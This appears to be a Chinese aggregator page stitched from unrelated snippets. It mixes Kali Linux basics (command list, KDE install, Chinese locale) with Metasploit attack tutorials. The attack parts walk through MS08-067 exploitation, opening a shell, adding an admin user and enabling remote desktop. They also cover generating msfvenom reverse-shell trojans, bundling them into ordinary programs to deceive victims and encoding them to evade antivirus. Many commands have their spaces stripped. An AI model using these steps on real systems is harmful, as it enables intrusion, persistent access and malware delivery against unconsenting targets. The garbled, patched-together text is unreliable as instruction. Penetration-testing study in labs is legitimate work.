metasploit linux?Metasploit简介
使用Metasploit渗透攻击Windows7并远程执行命令
本文章仅供学习交流,请自觉遵守法律法规。
实验环境:使用Kali系统与Windows7进行渗透测试。Kali系统IP为192.168.38.136,Windows7系统IP为192.168.38.56。实验操作可以基于虚拟机环境或两台电脑完成。
Metasploit简介:Metasploit是业界领先的渗透测试工具,其核心功能包括安全测试任务的执行与简化渗透测试流程。适用于所有流行操作系统,本文应用Kali Linux,因其自带Metasploit框架与第三方工具。
永恒之蓝概述:永恒之蓝是黑客团体Shadow Brokers在2017年泄露的一系列攻击工具之一,其中包含利用Windows系统SMB漏洞获取系统最高权限的工具。此工具在2017年5月被不法分子改造,用于制作WannaCry勒索病毒,导致全球多国的网络系统遭受攻击。
渗透攻击流程:主要包括已知漏洞识别、查找利用模块、配置参数、添加后门与发起攻击。步骤如下:
1.开启数据库服务,确保Metasploit程序正常运行。
2.在Kali系统中启动Metasploit框架。
3.配置与目标系统相关的漏洞参数。
4.选择并设置攻击载荷。
5.成功渗透Windows7系统后,在Kali系统中远程控制目标系统,并创建用户。
经过以上步骤,完成了对Windows7系统的渗透攻击。本文章旨在提供学习与交流,严格遵守法律法规。
kalilinux命令大全kalilinux命令
kalilinux命令手册?
kalilinux的命令手册如下:
ls查看文件或者是文件夹
mkdir建立文件夹
chmod设置文件或者是文件夹的权限
rm删除文件或者是文件夹
touch创建文件
nano/vim文本编辑器
date查看日期
uname显示内核
cal计算器
uptime查看使用时间和工作情况
top简易进程查看器
more查看文件(长文件)
less查看文件(长文件)
kalilinux复制文件到桌面命令?
1:对于习惯用windows的简单的方法:直接右键复制然后到home里面用右键粘贴。用命令行打开linux终端,如果您在桌面上就可以输入相对路径,如果您的当前目录不是在桌面就需要输入绝对路径:cp~/Desktop/aaa/home回车就可以了。
如何为KaliLinux安装KDE桌面环境?
打开终端,输入以下命令:
root@Kali:~#apt-getinstallkde-plasma-desktop
安装KDE需要458M的额外的磁盘空间,按Y键同意;
需要一些时间才能安装完成,它将要求配置kdm,按回车;
选择gdm3作为默认显示管理器;
注销系统,选择“KDEPlasmaWorkspace”选项,然后输入用户名和密码登录;
然后就可以进入KaliLinux的KDE桌面了,已经可以正常使用了。
kalilinux怎么换成中文显示?
kalilinux怎么换成中文的显示,可以通过以下步骤将KaliLinux切换为中文显示:
1.打开终端,输入命令:sudoaptupdatesudoaptinstalltask-chinese-simplified。
2.等待安装完成后,重启计算机。
3.在登录界面,选择中文。
4.登录系统后,打开终端输入命令:sudodpkg-reconfigurelocales。
5.选择“zh_CN.UTF-8”和“en_US.UTF-8”,按空格键选中,然后按回车键。
6.选择“zh_CN.UTF-8”为默认语言,按回车键。
7.重启计算机。
8.在KaliLinux界面上单击“设置”,然后选择“区域和语言”。
9.在“语言”选项卡下,选择“中文简体”,然后单击“应用”。
10.重启计算机,使更改生效。
完成以上步骤后,KaliLinux的用户界面将切换到中文显示。
kalilinux攻击漏洞MS08_067?
1,在Kali用命令msfconsole开启Metasploit(在终端里输入msfconsole)。
2,然后运行命令:useexploit/windows/smb/ms08_067_netapi#使用MS08067漏洞攻击程序
setLHOST192.168.116.3#设置本地主机IP
setRHOST192.168.116.116#设置目标主机IP
setpayloadwindows/shell_bind_tcp#设置payload
showoptions#查看设置信息
exploit#实施攻击
3,添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令netstat-an看一下目标主机开放端口的情况。
4,发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REGADDHKLMSYSTEMCurrentControlSetControlTerminal”“Server/vfDenyTSConnections/tREG_DWORD/d0/f
有了目标主机的cmdshell你想做什么不行吧?好了演示到此完毕!
Metasploit实现木马生成、捆绑及免杀
简介
在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。
实验环境:KaliLinux
知识点:msfvenom如何生成木马,msfvenom如何捆绑木马到常用软件,msfvenom如何对木马进行编码免杀。
Metasploit介绍
Metasploit是一个可用来发现、验证和利用漏洞的渗透测试平台,目前实验环境中Metasploit的版本是v4.12.23-dev包含了1577个exploits、907个auxiliary、272个post、455个payloads、39个encoders以及8个nops。
其中exploits是漏洞利用模块(也叫渗透攻击模块),auxiliary是辅助模块,post是后渗透攻击模块,payloads是攻击载荷也就是我们常说的shellcode,这里生成的木马其实就是payloads。
在本次试验中我们主要使用的是msfpayload(攻击荷载生成器),msfencoder(编码器)的替代品msfvenom,msfvenom集成了前两者的全部功能,可以生成payload(本节所说的木马)以及对payload编码免杀和避免坏字符、捆绑木马等。在KaliLinux中默认安装了Metasploitframework我们可以直接使用。
攻击机:KaliLinux2.0虚拟机,主机名是kali,IP地址为192.168.122.101,默认用户名和密码为root/toor。
靶机:Metasploitable2虚拟机,主机名是target,IP地址为192.168.122.102,默认用户名和密码为msfadmin/msfadmin。
本次实验我们只用到KaliLinux虚拟机。
我们先来查看当前环境虚拟机的列表和状态:
因环境中虚拟机太慢,这里采用docker容器。进入kalilinux系统的方式如下:
生成木马
在进行木马生成实验之前我们先来学习一下msfvenom命令的用法。在Kalilinux下输入如下命令,可以看到msfvenom的命令行选项。
./msfvenom-h捆绑木马
通常我们生成了木马之后,要运用社会工程学的攻击方式诱骗目标运行我们的木马程序,否则我们的木马只是玩具罢了。
捆绑木马我们还是使用上面提到的msfvenom命令,只不过这里我们要用到一个新的命令行选项-x。我们来看一下-x选项的用法及含义。
-x选项:允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
将生成的木马当做常用应用程序来捆绑木马。
虽然我们已经准备好了木马程序,并且也捆绑到了常用的应用程序上,但是现在杀毒软件泛滥,不经过免杀就算成功上传到目标主机,估计还没等运行就被杀掉了。这里用msfvenom生成木马同时对payload编码来实现木马的简单免杀。我们先来学习一下我们要用到的命令选项:
-e选项:用来指定要使用的编码器。-i选项:用来指定对payload编码的次数。先来看一下都有哪些编码器可用:
这里我们挑选一个免杀效果比较好的编码器x86/shikata_ga_nai,进行编码:
msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=192.168.122.101-ex86/shikata_ga_nai-i5-felf-o/root/payload_encoder.elf总结
从图中我们可以看到完成了对木马的5次编码,这样木马基本上就可以躲避部分杀毒软件的查杀,其实还可以对木马程序进行多次编码,虽然可以提高木马的免杀几率,不过可能会导致木马程序不可用。当然要想免杀效果更好就需要使用Metasploitpro版本或者给木马加壳、修改木马的特征码等等,不过要想躲过全部杀毒软件的查杀则会有些难度,通常会针对某个杀毒软件进行免杀。
来源:阿里云